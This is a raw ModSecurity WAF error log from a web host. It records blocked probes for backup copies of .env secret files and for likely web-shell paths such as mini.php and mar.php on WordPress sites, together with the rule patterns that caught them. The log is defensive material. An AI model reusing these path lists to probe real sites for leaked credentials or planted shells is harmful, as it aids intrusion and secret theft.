[Tue May 26 13:11:59.978596 2026] [security2:error] [pid 496740:tid 496902] [client 207.241.173.215:11788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.orig"] [unique_id "ahVOx-vOeft4ltnLrH41IgAAACA"]
[Tue May 26 13:11:59.979332 2026] [security2:error] [pid 496740:tid 496942] [client 207.241.173.215:11884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.backup"] [unique_id "ahVOx-vOeft4ltnLrH41HwAAAEg"]
[Tue May 26 13:11:59.996818 2026] [security2:error] [pid 496740:tid 496909] [client 207.241.173.215:11772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.swp"] [unique_id "ahVOx-vOeft4ltnLrH41JAAAACc"]
[Tue May 26 13:11:59.999953 2026] [security2:error] [pid 496740:tid 496965] [client 207.241.173.215:11870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.old"] [unique_id "ahVOx-vOeft4ltnLrH41KAAAAF8"]
[Tue May 26 13:12:00.000501 2026] [security2:error] [pid 496740:tid 496915] [client 207.241.173.215:11804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.copy"] [unique_id "ahVOx-vOeft4ltnLrH41JwAAAC0"]
[Tue May 26 13:12:00.001393 2026] [security2:error] [pid 496740:tid 496887] [client 207.241.173.215:11436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.old"] [unique_id "ahVOx-vOeft4ltnLrH41KQAAABE"]
[Tue May 26 13:12:00.009909 2026] [security2:error] [pid 496740:tid 496889] [client 207.241.173.215:11446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.old"] [unique_id "ahVOyOvOeft4ltnLrH41LAAAABM"]
[Tue May 26 13:12:00.009916 2026] [security2:error] [pid 496740:tid 496931] [client 207.241.173.215:11424] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.backup"] [unique_id "ahVOyOvOeft4ltnLrH41LgAAAD0"]
[Tue May 26 13:12:00.011053 2026] [security2:error] [pid 496740:tid 496898] [client 207.241.173.215:11852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.orig"] [unique_id "ahVOyOvOeft4ltnLrH41LQAAABw"]
[Tue May 26 13:12:00.022407 2026] [security2:error] [pid 496740:tid 496922] [client 207.241.173.215:11712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.backup"] [unique_id "ahVOyOvOeft4ltnLrH41MAAAADQ"]
[Tue May 26 13:12:00.023575 2026] [security2:error] [pid 496740:tid 496973] [client 207.241.173.215:11720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.swp"] [unique_id "ahVOyOvOeft4ltnLrH41MQAAAGc"]
[Tue May 26 13:12:00.072186 2026] [security2:error] [pid 496740:tid 496896] [client 207.241.173.215:11848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local~"] [unique_id "ahVOyOvOeft4ltnLrH41MgAAABo"]
[Tue May 26 13:12:00.118128 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:16147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/ftde.php"] [unique_id "ahVOyOvOeft4ltnLrH41NwAAACk"]
[Tue May 26 13:12:00.118223 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:16147] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/ftde.php"] [unique_id "ahVOyOvOeft4ltnLrH41NwAAACk"]
[Tue May 26 13:12:00.260954 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:14334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahVOyOvOeft4ltnLrH41PQAAAEE"]
[Tue May 26 13:12:00.261097 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:14334] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahVOyOvOeft4ltnLrH41PQAAAEE"]
[Tue May 26 13:12:00.298650 2026] [security2:error] [pid 496740:tid 496912] [client 216.244.66.241:46616] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/hemilaminectomybaea/dfcecd1154986.shtml"] [unique_id "ahVOyOvOeft4ltnLrH41PwAAACo"]
[Tue May 26 13:12:00.298763 2026] [security2:error] [pid 496740:tid 496912] [client 216.244.66.241:46616] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/hemilaminectomybaea/dfcecd1154986.shtml"] [unique_id "ahVOyOvOeft4ltnLrH41PwAAACo"]
[Tue May 26 13:12:00.406100 2026] [security2:error] [pid 496740:tid 496979] [client 20.151.117.104:40643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyOvOeft4ltnLrH41SQAAAG0"]
[Tue May 26 13:12:00.448579 2026] [security2:error] [pid 496740:tid 496755] [remote 104.23.217.19:12677] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVOx-vOeft4ltnLrH41JgAAWw4"]
[Tue May 26 13:12:00.476869 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:40643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/z.php"] [unique_id "ahVOyOvOeft4ltnLrH41SgAAADc"]
[Tue May 26 13:12:00.476952 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:40643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/z.php"] [unique_id "ahVOyOvOeft4ltnLrH41SgAAADc"]
[Tue May 26 13:12:00.625269 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:37140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/f35.php"] [unique_id "ahVOyOvOeft4ltnLrH41VAAAAAA"]
[Tue May 26 13:12:00.625398 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:37140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/f35.php"] [unique_id "ahVOyOvOeft4ltnLrH41VAAAAAA"]
[Tue May 26 13:12:00.768701 2026] [security2:error] [pid 496740:tid 496898] [client 20.151.117.104:37139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/file61.php"] [unique_id "ahVOyOvOeft4ltnLrH41VQAAABw"]
[Tue May 26 13:12:00.768847 2026] [security2:error] [pid 496740:tid 496898] [client 20.151.117.104:37139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/file61.php"] [unique_id "ahVOyOvOeft4ltnLrH41VQAAABw"]
[Tue May 26 13:12:00.912196 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:59290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/mah.php"] [unique_id "ahVOyOvOeft4ltnLrH41YAAAAF0"]
[Tue May 26 13:12:00.912309 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:59290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/mah.php"] [unique_id "ahVOyOvOeft4ltnLrH41YAAAAF0"]
[Tue May 26 13:12:00.979479 2026] [security2:error] [pid 496740:tid 496941] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOyOvOeft4ltnLrH41UAAAAEc"]
[Tue May 26 13:12:01.055024 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:44954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/mini.php"] [unique_id "ahVOyevOeft4ltnLrH41ZwAAADw"]
[Tue May 26 13:12:01.055161 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:44954] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/mini.php"] [unique_id "ahVOyevOeft4ltnLrH41ZwAAADw"]
[Tue May 26 13:12:01.197765 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:59290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/system_log.php"] [unique_id "ahVOyevOeft4ltnLrH41bgAAAEU"]
[Tue May 26 13:12:01.197899 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:59290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/system_log.php"] [unique_id "ahVOyevOeft4ltnLrH41bgAAAEU"]
[Tue May 26 13:12:01.341104 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:44954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/v.php"] [unique_id "ahVOyevOeft4ltnLrH41cAAAACE"]
[Tue May 26 13:12:01.341223 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:44954] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/v.php"] [unique_id "ahVOyevOeft4ltnLrH41cAAAACE"]
[Tue May 26 13:12:01.490371 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:37159] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyevOeft4ltnLrH41dgAAADA"]
[Tue May 26 13:12:01.561955 2026] [security2:error] [pid 496740:tid 496908] [client 20.151.117.104:37159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/seotheme/mar.php"] [unique_id "ahVOyevOeft4ltnLrH41gwAAACY"]
[Tue May 26 13:12:01.562064 2026] [security2:error] [pid 496740:tid 496908] [client 20.151.117.104:37159] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/seotheme/mar.php"] [unique_id "ahVOyevOeft4ltnLrH41gwAAACY"]
[Tue May 26 13:12:01.705500 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:35545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/Text/index.php"] [unique_id "ahVOyevOeft4ltnLrH41iAAAAAA"]
[Tue May 26 13:12:01.705723 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:35545] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/Text/index.php"] [unique_id "ahVOyevOeft4ltnLrH41iAAAAAA"]
[Tue May 26 13:12:01.858174 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:54427] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyevOeft4ltnLrH41jQAAAGA"]
[Tue May 26 13:12:01.932391 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:54427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-index.php"] [unique_id "ahVOyevOeft4ltnLrH41kQAAAC0"]
[Tue May 26 13:12:01.932505 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:54427] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-index.php"] [unique_id "ahVOyevOeft4ltnLrH41kQAAAC0"]
[Tue May 26 13:12:02.081646 2026] [security2:error] [pid 496740:tid 496931] [client 20.151.117.104:28900] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyuvOeft4ltnLrH41mAAAAD0"]
[Tue May 26 13:12:02.152763 2026] [security2:error] [pid 496740:tid 496943] [client 20.151.117.104:28900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws80.php"] [unique_id "ahVOyuvOeft4ltnLrH41nwAAAEk"]
[Tue May 26 13:12:02.152892 2026] [security2:error] [pid 496740:tid 496943] [client 20.151.117.104:28900] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws80.php"] [unique_id "ahVOyuvOeft4ltnLrH41nwAAAEk"]
[Tue May 26 13:12:02.299056 2026] [security2:error] [pid 496740:tid 496879] [client 20.151.117.104:14321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ww2.php"] [unique_id "ahVOyuvOeft4ltnLrH41pQAAAAk"]
[Tue May 26 13:12:02.299177 2026] [security2:error] [pid 496740:tid 496879] [client 20.151.117.104:14321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ww2.php"] [unique_id "ahVOyuvOeft4ltnLrH41pQAAAAk"]
[Tue May 26 13:12:02.447649 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:14318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/7logs.php"] [unique_id "ahVOyuvOeft4ltnLrH41rQAAAGo"]
[Tue May 26 13:12:02.447762 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:14318] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/7logs.php"] [unique_id "ahVOyuvOeft4ltnLrH41rQAAAGo"]
[Tue May 26 13:12:02.600267 2026] [security2:error] [pid 496740:tid 496871] [client 20.151.117.104:44981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ac.php"] [unique_id "ahVOyuvOeft4ltnLrH41tAAAAAE"]
[Tue May 26 13:12:02.600384 2026] [security2:error] [pid 496740:tid 496871] [client 20.151.117.104:44981] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ac.php"] [unique_id "ahVOyuvOeft4ltnLrH41tAAAAAE"]
[Tue May 26 13:12:02.747464 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:35571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ctex1.php"] [unique_id "ahVOyuvOeft4ltnLrH41twAAAGQ"]
[Tue May 26 13:12:02.747568 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:35571] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ctex1.php"] [unique_id "ahVOyuvOeft4ltnLrH41twAAAGQ"]
[Tue May 26 13:12:02.892821 2026] [security2:error] [pid 496740:tid 496881] [client 20.151.117.104:39981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/defaults.php"] [unique_id "ahVOyuvOeft4ltnLrH41vgAAAAs"]
[Tue May 26 13:12:02.892922 2026] [security2:error] [pid 496740:tid 496881] [client 20.151.117.104:39981] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/defaults.php"] [unique_id "ahVOyuvOeft4ltnLrH41vgAAAAs"]
[Tue May 26 13:12:03.035185 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:21655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/domains.php"] [unique_id "ahVOy-vOeft4ltnLrH41yQAAAHc"]
[Tue May 26 13:12:03.035283 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:21655] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/domains.php"] [unique_id "ahVOy-vOeft4ltnLrH41yQAAAHc"]
[Tue May 26 13:12:03.178611 2026] [security2:error] [pid 496740:tid 496883] [client 20.151.117.104:37139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/dropdown.php"] [unique_id "ahVOy-vOeft4ltnLrH410wAAAA0"]
[Tue May 26 13:12:03.178758 2026] [security2:error] [pid 496740:tid 496883] [client 20.151.117.104:37139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/dropdown.php"] [unique_id "ahVOy-vOeft4ltnLrH410wAAAA0"]
